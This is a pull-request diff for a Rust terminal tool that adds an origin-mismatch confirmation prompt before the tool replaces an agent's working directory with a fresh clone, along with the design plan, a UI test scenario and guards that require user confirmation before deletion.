### PR TITLE
Guard issue send against origin-mismatched work dirs (Fixes #190)

### DIFF
--- a/dev-docs/tmux-scenarios/origin-mismatch-confirm.json
+++ b/dev-docs/tmux-scenarios/origin-mismatch-confirm.json
@@ -1,0 +1,26 @@
+{
+  "config": {
+    "cols": 120,
+    "rows": 36,
+    "history_limit": 4000,
+    "initial_wait_ms": 100,
+    "assert_mode": "strict"
+  },
+  "steps": [
+    { "waitFor": "LLxprt Jefe" },
+    { "key": "i" },
+    { "waitFor": "Issues" },
+    { "key": "Enter" },
+    { "key": "S" },
+    { "waitFor": "Send to Agent" },
+    { "key": "Enter" },
+    { "waitFor": "Wrong Repository" },
+    { "expect": "Replace it with a fresh clone?" },
+    { "capture": "origin-mismatch-modal" },
+    { "key": "Escape" },
+    { "waitForNot": "Wrong Repository" },
+    { "capture": "origin-mismatch-cancelled" },
+    { "key": "q" },
+    { "waitForExit": 3000 }
+  ]
+}

--- a/project-plans/issue190-plan.md
+++ b/project-plans/issue190-plan.md
@@ -1,0 +1,300 @@
+# Issue #190 — Origin-mismatch confirm prompt for issue send-to-agent
+
+## Problem
+
+Most of issue #190 is already implemented (#184 clone-if-missing, #166
+dirty-copy guard, clone-URL derivation via `CloneIdentity`). The single
+remaining gap is **point #6**:
+
+> Do not auto-clone if `work_dir` exists but is a different/unrelated repo.
+> If `work_dir` exists and is a git repo whose `origin` does not match the
+> configured repository, surface a confirm prompt (default **no/halt**) rather
+> than silently clobbering it.
+
+Today, `ensure_workdir_cloned` (`src/app_input/issue_git_prep.rs`) returns
+`Ok(())` as soon as `is_git_workdir(work_dir)` is true — it never inspects
+`origin`. So a `work_dir` that is a git repo pointing at a *different* remote
+silently proceeds into dirty-check → checkout+pull of the *configured* repo's
+default branch on top of a foreign repo — a data/correctness hazard with no
+confirm and a confusing downstream error.
+
+## Scope
+
+Issues mode only (`prepare_issue_target` / `prepare_local` / `prepare_remote`
+in `src/app_input/issue_prep.rs` are used only by `issues_send.rs`). PR mode
+does **not** use this orchestration (it only reuses `write_prompt_to_target`),
+so it is out of scope.
+
+## Design
+
+### 1. Make `git_info::parse_origin_url` public
+
+`src/git_info/mod.rs`: change `pub(crate) fn parse_origin_url` → `pub fn`.
+It is already the canonical origin-URL normalizer (SSH/HTTPS/bare →
+`owner/repo`). The binary crate (`app_input`) needs it; this is the DRY
+choice (single source of truth for origin normalization).
+
+**DONE** (already applied on this branch).
+
+### 2. Local origin helpers in `issue_git_prep.rs`
+
+Add pure + git-backed helpers:
+
+- `pub(super) fn origin_shortform(work_dir: &Path) -> Option<String>` — runs
+  `git -C <work_dir> remote get-url origin`, trims, normalizes via
+  `jefe::git_info::parse_origin_url`. Returns `None` on git failure or when
+  the URL is unparseable.
+- `pub(super) fn origins_match(actual_url: &str, expected_owner_repo: &str)
+  -> bool` — pure predicate: normalize `actual_url` via
+  `parse_origin_url`, compare case-sensitively to the trimmed
+  `expected_owner_repo`. (Both are already normalized `owner/repo`.)
+
+### 3. Tri-state clone assurance
+
+Extend the clone seam to return an origin-mismatch signal. Replace
+`ensure_workdir_cloned` with a richer function (keep the old name for the
+existing test seam but add an origin-aware variant):
+
+```rust
+pub(super) enum WorkdirAssurance {
+    /// Already a git repo with matching origin (or no expected shortform
+    /// to compare against). Proceed with the normal prep flow.
+    Ready,
+    /// Was missing and has just been cloned. Proceed (clone lands on the
+    /// remote's default branch, so origin already matches).
+    JustCloned,
+    /// Exists and is a git repo, but origin does not match the configured
+    /// repository. Caller must prompt the user before any destructive action.
+    OriginMismatch { actual: String, expected: String },
+}
+
+pub(super) fn ensure_workdir_with_origin(
+    work_dir: &Path,
+    clone_url: Option<&str>,
+    expected_shortform: Option<&str>,
+) -> Result<WorkdirAssurance, String>
+```
+
+Logic:
+1. If `is_git_workdir(work_dir)`:
+   - If `expected_shortform` is `Some(expected)`:
+     - read `origin_shortform(work_dir)`; if it is `Some(actual)` and
+       `actual != expected` → return `OriginMismatch { actual, expected }`.
+     - if origin is unreadable (no `origin` remote), treat as mismatch too
+       (a git repo with no `origin` is not the configured repo).
+   - Otherwise return `Ready`.
+2. If `path_exists(work_dir)` → `Err` (existing non-git dir).
+3. If missing: clone (reuse existing `clone_repository`), then `JustCloned`.
+
+Keep `ensure_workdir_cloned` as a thin wrapper calling
+`ensure_workdir_with_origin(work_dir, clone_url, None)` and mapping
+`Ready|JustCloned → Ok(())`, so the existing `local_clone_when_missing_with_url`
+test still passes unchanged.
+
+### 4. New `PrepOutcome::OriginMismatch` variant
+
+`src/app_input/issue_prep.rs`:
+
+```rust
+pub(super) enum PrepOutcome {
+    Ready,
+    Dirty,
+    /// Workdir is a git repo whose origin does not match the configured
+    /// repository. Caller must open the origin-mismatch confirm modal.
+    OriginMismatch { actual: String, expected: String },
+}
+```
+
+`prepare_local`: replace
+```rust
+ensure_workdir_cloned(work_dir, owned_url.as_deref())?;
+```
+with
+```rust
+let expected = identity.map(CloneIdentity::owner_repo);  // need to expose owner_repo
+match ensure_workdir_with_origin(work_dir, owned_url.as_deref(), expected)? {
+    WorkdirAssurance::Ready | WorkdirAssurance::JustCloned => {}
+    WorkdirAssurance::OriginMismatch { actual, expected } => {
+        return Ok(PrepOutcome::OriginMismatch { actual, expected });
+    }
+}
+```
+
+This requires `CloneIdentity::owner_repo()` to be callable from
+`issue_prep.rs`. It is currently `pub(super)` within `clone_identity.rs`
+(super = `app_input`). `issue_prep.rs` is also in `app_input`, so
+`CloneIdentity::owner_repo` is already accessible via `use super::clone_identity::CloneIdentity`.
+**Verify** the visibility works (it should — both modules share the same
+parent `app_input`). If not, expose a new `pub(super) fn expected_shortform`
+on `CloneIdentity`.
+
+`prepare_remote`: mirror the same logic using a remote predicate probe
+(`run_remote_check`) to read the origin URL on the remote host:
+
+- After the existing "exists + is git worktree" detection, if identity is
+  present, run a probe that prints the normalized origin shortform (or a
+  sentinel when there is no `origin`), compare to `identity.owner_repo()`.
+- On mismatch return `PrepOutcome::OriginMismatch`.
+
+The `RemotePrepPlanner::plan` must also be extended to plan an origin-check
+op (pure, for tests) — add an `origin_mismatch: bool` field to `PlanInputs`
+and plan a no-op short-circuit when true (mirroring `Dirty`+Stop).
+
+### 5. New modal `ConfirmIssueOriginMismatch`
+
+`src/state/types.rs`:
+
+```rust
+ConfirmIssueOriginMismatch {
+    agent_id: AgentId,
+    work_dir: std::path::PathBuf,
+    signature: LaunchSignature,
+    payload: crate::github::SendPayload,
+    actual: String,
+    expected: String,
+},
+```
+
+Mirrors `ConfirmIssueDirtyCopy` but carries the actual/expected origins for
+the confirm message. Runtime-only (not in `PersistedState`).
+
+### 6. Wire the modal end-to-end
+
+- `src/app_input/issues_send.rs` `dispatch_agent_chooser_confirm`:
+  in the `match prepare_issue_target(...)` add an arm:
+  ```rust
+  Ok(PrepOutcome::OriginMismatch { actual, expected }) => {
+      prompt_origin_mismatch_confirm(
+          app_state, ctx, &send_info.agent_id, &send_info.work_dir,
+          launch_sig, send_info.payload.clone(), actual, expected,
+      );
+  }
+  ```
+  Same in `confirm_issue_dirty_copy_enter` (the Discard path can also hit
+  origin-mismatch if the workdir changed between the first send and the
+  confirm — though unlikely, handle it by re-prompting rather than failing).
+
+- New `prompt_origin_mismatch_confirm(...)` in `issues_send.rs`: sets
+  `state.modal = ModalState::ConfirmIssueOriginMismatch { ... }` and
+  persists.
+
+- New `confirm_issue_origin_mismatch_enter(...)` in `issues_send.rs`:
+  called when the user presses Enter to opt in. It closes the modal,
+  re-checks availability, resolves the target, then **re-runs prep with a
+  force-reclone**: remove the mismatched workdir and re-clone from the
+  configured identity, then proceed with the normal flow
+  (dirty-check is a no-op on a fresh clone → checkout+pull → write prompt →
+  launch). Use a new `DirtyPolicy::ForceReclone` OR a dedicated
+  `prepare_issue_target_force_reclone` entry point that removes+reclones
+  before delegating to the existing prep. Prefer the dedicated entry point
+  to keep `DirtyPolicy` semantics clean (it is about dirty handling, not
+  about origin).
+
+- `src/app_input/modal_handlers.rs` `handle_mode_confirm_key`: add
+  `ConfirmIssueOriginMismatch` to the confirm-key guard (Enter → proceed,
+  Esc/n → halt), mirroring the `ConfirmIssueDirtyCopy` block. Extend
+  `handle_confirm_enter` to dispatch the new modal to
+  `confirm_issue_origin_mismatch_enter`.
+
+- `src/input.rs` `InputMode` derivation: add
+  `| ModalState::ConfirmIssueOriginMismatch { .. } => return InputMode::Confirm,`
+  alongside `ConfirmIssueDirtyCopy`.
+
+- `src/mouse_routing.rs`: add `ConfirmIssueOriginMismatch` to the two
+  `ConfirmIssueDirtyCopy` match arms (lines ~734, ~754) so mouse selection
+  is handled consistently.
+
+- `src/ui/orchestration.rs`:
+  - `derive_confirm_modal_data`: add an arm producing a
+    `ConfirmModalData` with title "Wrong Repository" and a message like
+    `"Working copy origin is {actual}, expected {expected}. Replace it with a fresh clone?"`.
+  - `build_modal_element`: add `ConfirmIssueOriginMismatch` to the
+    `confirm_data.map(...)` arm.
+
+- `src/selection/overlay_content.rs`: the test at ~line 277 builds a
+  `ConfirmIssueDirtyCopy`; the new modal will be exercised by a new test
+  (no change needed to the existing test).
+
+### 7. Force-reclone implementation (the opt-in action)
+
+When the user opts in to replacing the mismatched repo:
+
+1. `std::fs::remove_dir_all(&work_dir)` (local) or
+   `rm -rf <work_dir>` over SSH (remote).
+2. Re-clone via the existing clone seam (`ensure_workdir_cloned` with the
+   configured `clone_url` — origin now matches by construction).
+3. Proceed with `run_local_policy_and_prep` (dirty-check → checkout+pull →
+   write prompt).
+
+For remote, the `RemotePrepRunner` needs a `force_reclone` mode. Add a
+method `run_force_reclone(work_dir, identity, prompt)` that does
+`rm -rf && git clone && (dirty-check n/a) && checkout+pull && write prompt`
+in the appropriate `ssh -T` ops.
+
+To keep the entry point uniform, expose from `issue_prep.rs`:
+
+```rust
+pub(super) fn prepare_issue_target_force_reclone(
+    target: &WorkTarget,
+    work_dir: &Path,
+    identity: Option<&CloneIdentity>,
+    prompt: &str,
+) -> Result<PrepOutcome, String>
+```
+
+It removes+reclones then delegates to the post-clone prep. No dirty-check
+needed (fresh clone is clean). It must still do checkout+pull to sync to the
+remote default branch and write the prompt.
+
+## Tests (TDD: RED first, then GREEN)
+
+### Pure unit tests (`issue_git_prep.rs` `tests` module)
+
+- `origins_match` accepts HTTPS, SSH, bare forms of the same `owner/repo`.
+- `origins_match` rejects a different `owner/repo`.
+- `origins_match` rejects unparseable URLs (returns false when there is no
+  expected to compare? — define: `origins_match` compares two already-
+  normalized strings; the normalization happens in `origin_shortform`).
+
+### `issue_prep_tests.rs` (local integration with temp repos)
+
+- **origin-mismatch detected**: clone a bare origin A into `work`, then
+  call `prepare_local` with an identity whose `owner_repo` is a *different*
+  repo → must return `PrepOutcome::OriginMismatch` (NOT `Ready`), and the
+  workdir must be untouched (no checkout/pull ran).
+- **origin-match proceeds**: clone origin A, identity matches A →
+  `PrepOutcome::Ready`.
+- **no identity, existing repo**: `prepare_local` with `identity=None` and
+  an existing git repo → `Ready` (no origin check when no expected
+  shortform — preserves existing #166 behavior).
+- **force-reclone replaces mismatched repo**: after an `OriginMismatch`,
+  call the force-reclone entry point → workdir now has the configured
+  origin, prompt is written, returns `Ready`.
+- **happy-path delegation unchanged**: existing clone-when-missing and
+  clean-prep tests still pass (regression-safe).
+
+### Remote planner tests (`issue_prep_tests.rs`)
+
+- `PlanInputs { origin_mismatch: true, .. }` → the planner short-circuits
+  (no checkout/pull/prompt op planned), mirroring `Dirty`+Stop.
+- The remote planner plans an origin-check predicate probe when
+  `exists_is_git` and an identity is present.
+
+### Modal/state tests
+
+- New test in `app_input/app_input_tests.rs`: `ConfirmIssueOriginMismatch`
+  routes to `InputMode::Confirm` (mirror
+  `confirm_issue_dirty_copy_modal_routes_to_confirm_input_mode`).
+- New test in `selection/overlay_content.rs`: confirm modal renders the
+  actual/expected origin strings.
+
+## Out of scope
+
+- PR mode origin-mismatch (PR send uses a different path).
+- Changing the clone URL protocol (HTTPS-only from #184 is preserved).
+- Loosening any lint/complexity rule (forbidden; fix root causes instead).
+
+## Verification
+
+`make ci-check` (fmt check + clippy `-D warnings` + build + coverage ≥30% +
+test). Then `rustreviewer` review, then PR with `Fixes #190`.

--- a/src/app_input/app_input_tests.rs
+++ b/src/app_input/app_input_tests.rs
@@ -2,15 +2,12 @@ use super::prs_orchestration::{pr_send_info_from_state, write_pr_prompt};
 use super::*;
 use std::path::PathBuf;
 
-use super::issues_send::{issue_send_info_from_state, prepare_issue_launch_signature};
 use jefe::domain::{
     Agent, AgentId, AgentStatus, DEFAULT_SANDBOX_FLAGS, LaunchSignature, RemoteRepositorySettings,
     RepositoryId, RuntimeBinding, SandboxEngine,
 };
-use jefe::domain::{IssueDetail, IssueState};
-use jefe::state::{AgentChooserState, ScreenMode};
 
-trait TestResultExt<T> {
+pub(super) trait TestResultExt<T> {
     fn value_or_panic(self, context: &str) -> T;
 }
 
@@ -23,7 +20,7 @@ impl<T, E: std::fmt::Debug> TestResultExt<T> for Result<T, E> {
     }
 }
 
-trait TestOptionExt<T> {
+pub(super) trait TestOptionExt<T> {
     fn value_or_panic(self, context: &str) -> T;
 }
 
@@ -36,7 +33,7 @@ impl<T> TestOptionExt<T> for Option<T> {
     }
 }
 
-fn sample_signature() -> LaunchSignature {
+pub(super) fn sample_signature() -> LaunchSignature {
     LaunchSignature {
         work_dir: PathBuf::from("/tmp/agent"),
         profile: String::new(),
@@ -51,7 +48,7 @@ fn sample_signature() -> LaunchSignature {
     }
 }
 
-fn sample_agent(agent_id: &AgentId) -> Agent {
+pub(super) fn sample_agent(agent_id: &AgentId) -> Agent {
     Agent::new(
         agent_id.clone(),
         RepositoryId(String::from("repo-1")),
@@ -712,261 +709,5 @@ fn test_inline_submit_dispatch_applies_reducer_before_mutation() {
             InlineState::Composer { ref text, .. } if text == "ship it"
         ),
         "composer text must be preserved for the mutation helper to read"
-    );
-}
-
-// ── Issue send-to-agent: default-branch prep + dirty-copy guard (issue #166) ─
-
-/// Build an AppState for the issue agent-chooser send path: an open chooser +
-/// issue detail + an agent (with `pass_continue = true`) whose work_dir is a
-/// temp dir. Mirrors `state_for_pr_agent_chooser_confirm`.
-fn state_for_issue_agent_chooser_send(
-    agent_id: &AgentId,
-    work_dir: &std::path::Path,
-) -> jefe::state::AppState {
-    let mut agent = sample_agent(agent_id);
-    agent.work_dir = work_dir.to_path_buf();
-    // sample_agent uses Agent::new which defaults pass_continue = true.
-    assert!(
-        agent.pass_continue,
-        "test fixture: agent must default to pass_continue = true"
-    );
-
-    let detail = IssueDetail {
-        repo_owner_name: "owner/repo".to_owned(),
-        number: 166,
-        title: "Issue send should checkout+pull main".to_owned(),
-        state: IssueState::Open,
-        author_login: "reporter".to_owned(),
-        created_at: "2024-01-01T00:00:00Z".to_owned(),
-        updated_at: "2024-01-02T00:00:00Z".to_owned(),
-        labels: vec![],
-        assignees: vec![],
-        milestone: None,
-        body: "Send to agent".to_owned(),
-        external_url: "https://github.com/owner/repo/issues/166".to_owned(),
-        comments: vec![],
-        has_more_comments: false,
-        comments_cursor: None,
-    };
-
-    let issues_state = jefe::state::IssuesState {
-        active: true,
-        issue_detail: Some(detail),
-        agent_chooser: Some(AgentChooserState {
-            selected_index: 0,
-            agents: vec![(agent_id.clone(), String::from("Agent One"))],
-        }),
-        ..jefe::state::IssuesState::default()
-    };
-
-    let mut state = jefe::state::AppState {
-        screen_mode: ScreenMode::DashboardIssues,
-        issues_state,
-        ..AppState::default()
-    };
-    state.agents.push(agent);
-    state.repositories.push(jefe::domain::Repository::new(
-        RepositoryId(String::from("repo-1")),
-        String::from("Repo 1"),
-        String::from("owner/repo"),
-        PathBuf::from("/tmp/repo1"),
-    ));
-    state.selected_repository_index = Some(0);
-    state
-}
-
-/// The issue-driven launch path must force `pass_continue = false` on the
-/// constructed launch signature, even though the agent's configured
-/// `pass_continue` defaults to `true`. This test resolves the send info
-/// (which copies the agent's `pass_continue`) and then applies the SAME
-/// override `dispatch_agent_chooser_confirm` applies, asserting `--continue`
-/// would never reach the agent. The git prep + spawn require a runtime/git
-/// repo and are guarded out in unit tests (SharedContext is None).
-#[test]
-fn issue_send_forces_pass_continue_false_on_launch_signature() {
-    let agent_id = AgentId(String::from("issue-agent-1"));
-    // This test only exercises pure struct transforms — the work_dir is
-    // never materialized on disk — so a static path suffices.
-    let work_dir = std::path::PathBuf::from("/tmp/jefe-issue-send-test");
-    let state = state_for_issue_agent_chooser_send(&agent_id, &work_dir);
-
-    let send_info = issue_send_info_from_state(&state)
-        .unwrap_or_else(|| panic!("issue_send_info must resolve with chooser + detail + agent"));
-
-    // The send info copies the agent's configured pass_continue (true).
-    assert!(
-        send_info.signature.pass_continue,
-        "send info should inherit the agent's pass_continue = true"
-    );
-
-    // dispatch_agent_chooser_confirm forces pass_continue = false before launch.
-    // This calls the REAL production helper so removing the override would
-    // cause this test to fail.
-    let launch_sig = prepare_issue_launch_signature(send_info.signature);
-    assert!(
-        !launch_sig.pass_continue,
-        "issue-driven launches must force pass_continue = false"
-    );
-    assert!(
-        launch_sig
-            .mode_flags
-            .iter()
-            .any(|flag| flag.contains(".jefe/issue-prompt.md")),
-        "issue launch signature must include the issue prompt instruction"
-    );
-}
-
-#[test]
-fn code_puppy_issue_send_carries_kind_and_uses_positional_instruction() {
-    let agent_id = AgentId(String::from("code-puppy-issue-agent"));
-    let work_dir = std::path::PathBuf::from("/tmp/jefe-code-puppy-issue-send");
-    let mut state = state_for_issue_agent_chooser_send(&agent_id, &work_dir);
-    let Some(agent) = state.agents.iter_mut().find(|agent| agent.id == agent_id) else {
-        panic!("fixture agent should exist");
-    };
-    agent.agent_kind = jefe::domain::AgentKind::CodePuppy;
-
-    let send_info = issue_send_info_from_state(&state)
-        .unwrap_or_else(|| panic!("CodePuppy issue send info should resolve"));
-    assert_eq!(
-        send_info.signature.agent_kind,
-        jefe::domain::AgentKind::CodePuppy
-    );
-
-    let launch_sig = prepare_issue_launch_signature(send_info.signature);
-    assert!(!launch_sig.pass_continue);
-    assert!(!launch_sig.mode_flags.iter().any(|arg| arg == "-i"));
-    assert!(
-        launch_sig
-            .mode_flags
-            .iter()
-            .any(|arg| arg.contains(".jefe/issue-prompt.md"))
-    );
-}
-
-/// The `ConfirmIssueDirtyCopy` modal must resolve to `InputMode::Confirm` so
-/// the confirm key handler routes Enter/Esc/n correctly.
-#[test]
-fn confirm_issue_dirty_copy_modal_routes_to_confirm_input_mode() {
-    use jefe::input::input_mode_for_state;
-
-    let state = AppState {
-        modal: ModalState::ConfirmIssueDirtyCopy {
-            agent_id: AgentId(String::from("a1")),
-            work_dir: PathBuf::from("/tmp/x"),
-            signature: sample_signature(),
-            payload: jefe::github::SendPayload::default(),
-        },
-        ..AppState::default()
-    };
-
-    assert_eq!(
-        input_mode_for_state(&state),
-        jefe::input::InputMode::Confirm,
-        "ConfirmIssueDirtyCopy must use InputMode::Confirm"
-    );
-}
-
-// ── Issue #184: validated clone identity in issue-send info ─────────────
-
-/// Issue-send info must carry a valid clone identity ONLY when
-/// `github_repo` is a valid `owner/repo`, and NEVER fall back to `slug`.
-#[test]
-fn issue_send_info_carries_valid_clone_identity_only() {
-    let agent_id = AgentId(String::from("issue-valid-id"));
-    let work_dir = PathBuf::from("/tmp/jefe-issue-valid-id");
-    let mut state = state_for_issue_agent_chooser_send(&agent_id, &work_dir);
-    // Set a valid github_repo.
-    state.repositories[0].github_repo = "acme/widgets".to_owned();
-
-    let send_info = issue_send_info_from_state(&state)
-        .value_or_panic("issue send info must resolve with a valid github_repo");
-    let identity = send_info
-        .clone_identity
-        .as_ref()
-        .value_or_panic("a valid github_repo must yield a clone identity");
-    assert_eq!(identity.clone_url(), "https://github.com/acme/widgets.git");
-}
-
-/// When `github_repo` is empty but `slug` is set, issue-send info must NOT
-/// carry a clone identity (no fallback to slug).
-#[test]
-fn issue_send_info_no_clone_identity_when_github_repo_empty() {
-    let agent_id = AgentId(String::from("issue-no-id"));
-    let work_dir = PathBuf::from("/tmp/jefe-issue-no-id");
-    let mut state = state_for_issue_agent_chooser_send(&agent_id, &work_dir);
-    // slug is "owner/repo" (set by the fixture) but github_repo is empty.
-    state.repositories[0].github_repo = String::new();
-    assert!(
-        !state.repositories[0].slug.is_empty(),
-        "fixture: slug must be non-empty to prove no fallback"
-    );
-
-    let send_info =
-        issue_send_info_from_state(&state).value_or_panic("issue send info must still resolve");
-    assert!(
-        send_info.clone_identity.is_none(),
-        "no clone identity when github_repo is empty (must not fall back to slug)"
-    );
-}
-
-/// When `github_repo` is a URL (invalid), issue-send info must NOT carry a
-/// clone identity, even though slug looks valid.
-#[test]
-fn issue_send_info_no_clone_identity_for_url_shaped_github_repo() {
-    let agent_id = AgentId(String::from("issue-url-id"));
-    let work_dir = PathBuf::from("/tmp/jefe-issue-url-id");
-    let mut state = state_for_issue_agent_chooser_send(&agent_id, &work_dir);
-    state.repositories[0].github_repo = "https://github.com/acme/widgets".to_owned();
-
-    let send_info =
-        issue_send_info_from_state(&state).value_or_panic("issue send info must still resolve");
-    assert!(
-        send_info.clone_identity.is_none(),
-        "URL-shaped github_repo must not yield a clone identity"
-    );
-}
-
-/// CodePuppy issue send uses the SAME prep path (identical launch signature
-/// structure) and a fresh no-resume signature. This proves CodePuppy and
-/// LLxprt share identical prep; only the runtime args differ.
-#[test]
-fn code_puppy_issue_uses_identical_prep_and_fresh_no_resume_signature() {
-    let agent_id = AgentId(String::from("cp-identical-prep"));
-    let work_dir = PathBuf::from("/tmp/jefe-cp-identical-prep");
-    let mut state = state_for_issue_agent_chooser_send(&agent_id, &work_dir);
-    state.repositories[0].github_repo = "acme/widgets".to_owned();
-    if let Some(agent) = state.agents.iter_mut().find(|a| a.id == agent_id) {
-        agent.agent_kind = jefe::domain::AgentKind::CodePuppy;
-    }
-
-    let send_info =
-        issue_send_info_from_state(&state).value_or_panic("CodePuppy issue send info must resolve");
-
-    // Same validated clone identity as LLxprt would get (identical prep).
-    let identity = send_info
-        .clone_identity
-        .as_ref()
-        .value_or_panic("CodePuppy must carry the same validated clone identity");
-    assert_eq!(identity.clone_url(), "https://github.com/acme/widgets.git");
-
-    // Fresh no-resume signature: pass_continue forced off, positional
-    // instruction (no -i).
-    let launch_sig = prepare_issue_launch_signature(send_info.signature);
-    assert!(
-        !launch_sig.pass_continue,
-        "CodePuppy issue send must be fresh (no resume)"
-    );
-    assert!(
-        !launch_sig.mode_flags.iter().any(|arg| arg == "-i"),
-        "CodePuppy must not receive -i (runtime prepends it)"
-    );
-    assert!(
-        launch_sig
-            .mode_flags
-            .iter()
-            .any(|arg| arg.contains(".jefe/issue-prompt.md")),
-        "CodePuppy issue signature must reference the issue prompt"
     );
 }

--- a/src/app_input/clone_identity.rs
+++ b/src/app_input/clone_identity.rs
@@ -97,6 +97,13 @@ impl CloneIdentity {
         format!("https://github.com/{}.git", self.owner_repo)
     }
 
+    /// The validated `owner/repo` string, used as the expected origin
+    /// shortform for the origin-mismatch check (issue #190).
+    #[must_use]
+    pub(super) fn expected_shortform(&self) -> &str {
+        &self.owner_repo
+    }
+
     /// The validated `owner/repo` string.
     #[cfg(test)]
     #[must_use]

--- a/src/app_input/issue_git_prep.rs
+++ b/src/app_input/issue_git_prep.rs
@@ -17,6 +17,15 @@
 use std::path::Path;
 use std::process::{Command, Stdio};
 
+/// Safety guards for the destructive force-reclone path (issue #190).
+///
+/// Re-exported here so callers can reference
+/// `super::issue_git_prep::validate_reclone_target` regardless of the internal
+/// module split.
+#[path = "reclone_safety.rs"]
+mod reclone_safety;
+pub(super) use reclone_safety::validate_reclone_target;
+
 /// Paths that jefe/llxprt own and that must never count as "dirty" working
 /// copy state, nor be swept by cleanup. Matched as path *prefixes* against
 /// the porcelain path column.
@@ -56,55 +65,19 @@ pub(super) fn path_exists(work_dir: &Path) -> bool {
 /// an existing non-git directory fails safely.
 pub(super) fn ensure_workdir_cloned(work_dir: &Path, clone_url: Option<&str>) -> PrepResult {
     let assurance = ensure_workdir_with_origin(work_dir, clone_url, None)?;
-    // With no expected shortform, OriginMismatch is unreachable: the inner
+    // With no expected shortform, OriginMismatch cannot occur: the inner
     // function only emits it when a shortform was provided for comparison.
-    // Match exhaustively so a future caller passing a shortform here is a
-    // compile error rather than a silently-discarded mismatch.
+    // Match exhaustively so a future caller adding a shortform here is a
+    // compile error rather than a silently-discarded mismatch, and return a
+    // descriptive error (never a runtime panic) if the invariant is somehow
+    // violated.
     match assurance {
         WorkdirAssurance::Ready | WorkdirAssurance::JustCloned => Ok(()),
-        WorkdirAssurance::OriginMismatch { .. } => unreachable!(
+        WorkdirAssurance::OriginMismatch { .. } => Err(
             "OriginMismatch requires an expected shortform, which ensure_workdir_cloned never passes"
+                .to_owned(),
         ),
     }
-}
-
-/// Validate that `work_dir` is a safe target for a destructive force-reclone.
-///
-/// Rejects targets that would cause catastrophic data loss if removed:
-/// - empty/whitespace-only paths,
-/// - the filesystem root (`/` on Unix, `` on Windows),
-/// - a bare drive root (`C:`) on Windows,
-/// - a path with fewer than two named components (e.g. `/home`, `/tmp`),
-///   which is too broad to remove in an automated reclone.
-///
-/// This is a defense-in-depth guard: the `ConfirmedReclone` token already
-/// proves the user confirmed, but a misconfigured `work_dir` (root, empty,
-/// or a top-level directory) must never reach `rm -rf` even with
-/// confirmation. The check is locale- and platform-independent and has no
-/// side effects.
-pub(super) fn validate_reclone_target(work_dir: &Path) -> Result<(), String> {
-    let lossy = work_dir.to_string_lossy();
-    let trimmed = lossy.trim();
-    if trimmed.is_empty() {
-        return Err("Refusing to force-reclone: work_dir is empty.".to_owned());
-    }
-    // Count named components (Normal). Root/prefix/curdir/parent don't count.
-    // A safe work_dir has at least two named components (e.g. /home/user,
-    // /tmp/agent1), so removing it cannot nuke a top-level OS directory like
-    // /home or /tmp.
-    let named_count = work_dir
-        .components()
-        .filter(|c| matches!(c, std::path::Component::Normal(_)))
-        .count();
-    if named_count < 2 {
-        return Err(format!(
-            "Refusing to force-reclone {}: it resolves to a filesystem root or a top-level \
-             directory, which would delete too much. The work_dir must have at least two path \
-             components.",
-            work_dir.display()
-        ));
-    }
-    Ok(())
 }
 
 /// Zero-sized proof token that the caller has obtained explicit user
@@ -201,7 +174,7 @@ pub(super) fn ensure_workdir_with_origin(
                     // a missing one) surfaces a diagnosable actual value
                     // rather than an empty string indistinguishable from
                     // "no origin".
-                    let actual = jefe::git_info::parse_origin_url(&raw_url)
+                    let actual = jefe::git_info::origin_display_shortform(&raw_url)
                         .filter(|s| !s.is_empty())
                         .unwrap_or_else(|| raw_url.clone());
                     Ok(WorkdirAssurance::OriginMismatch {
@@ -945,38 +918,5 @@ mod tests {
             "https://GitHub.COM/acme/widgets.git",
             "acme/widgets"
         ));
-    }
-
-    // ── validate_reclone_target: catastrophic-target guard ───────────
-
-    #[test]
-    fn validate_reclone_target_rejects_empty() {
-        assert!(validate_reclone_target(Path::new("")).is_err());
-        assert!(validate_reclone_target(Path::new("   ")).is_err());
-    }
-
-    #[test]
-    fn validate_reclone_target_rejects_filesystem_root() {
-        assert!(
-            validate_reclone_target(Path::new("/")).is_err(),
-            "root must be rejected"
-        );
-    }
-
-    #[test]
-    fn validate_reclone_target_rejects_top_level_entry() {
-        // A single component directly under root (no meaningful parent)
-        // is too destructive for an automated reclone.
-        assert!(validate_reclone_target(Path::new("/home")).is_err());
-        assert!(validate_reclone_target(Path::new("/tmp")).is_err());
-    }
-
-    #[test]
-    fn validate_reclone_target_accepts_nested_path() {
-        assert!(
-            validate_reclone_target(Path::new("/home/user/work/agent1")).is_ok(),
-            "a normal nested work_dir must be accepted"
-        );
-        assert!(validate_reclone_target(Path::new("/srv/repos/jefe/agents/a1")).is_ok(),);
     }
 }

--- a/src/app_input/issue_git_prep.rs
+++ b/src/app_input/issue_git_prep.rs
@@ -56,17 +56,48 @@ pub(super) fn path_exists(work_dir: &Path) -> bool {
 /// an existing non-git directory fails safely.
 pub(super) fn ensure_workdir_cloned(work_dir: &Path, clone_url: Option<&str>) -> PrepResult {
     let assurance = ensure_workdir_with_origin(work_dir, clone_url, None)?;
-    // No expected shortform → mismatch is impossible, all variants map to Ok.
-    let _ = assurance;
-    Ok(())
+    // With no expected shortform, OriginMismatch is unreachable: the inner
+    // function only emits it when a shortform was provided for comparison.
+    // Match exhaustively so a future caller passing a shortform here is a
+    // compile error rather than a silently-discarded mismatch.
+    match assurance {
+        WorkdirAssurance::Ready | WorkdirAssurance::JustCloned => Ok(()),
+        WorkdirAssurance::OriginMismatch { .. } => unreachable!(
+            "OriginMismatch requires an expected shortform, which ensure_workdir_cloned never passes"
+        ),
+    }
+}
+
+/// Zero-sized proof token that the caller has obtained explicit user
+/// confirmation for a destructive workdir replacement.
+///
+/// Constructing this token is the single sanctioned way to authorize
+/// [`remove_workdir`]: the only constructor ([`ConfirmedReclone::confirmed`])
+/// is a private `pub(super)` item, so callers outside this module cannot
+/// fabricate one. This makes the "user must confirm before destruction"
+/// contract a compile-time guarantee rather than a doc comment that a future
+/// caller could silently bypass.
+#[derive(Debug, Clone, Copy)]
+pub(super) struct ConfirmedReclone(());
+
+impl ConfirmedReclone {
+    /// Produce the confirmation token. `pub(super)` so only the force-reclone
+    /// orchestration (which runs after the `ConfirmIssueOriginMismatch` modal)
+    /// can mint one.
+    #[must_use]
+    pub(super) fn confirmed() -> Self {
+        Self(())
+    }
 }
 
 /// Remove the working copy directory entirely (for the force-reclone path).
 ///
 /// This is destructive: it deletes the entire `work_dir` and all its
-/// contents. The caller must have obtained explicit user confirmation before
-/// invoking this.
-pub(super) fn remove_workdir(work_dir: &Path) -> Result<(), String> {
+/// contents. The required [`ConfirmedReclone`] token is the compile-time
+/// guarantee that the caller has already obtained explicit user confirmation
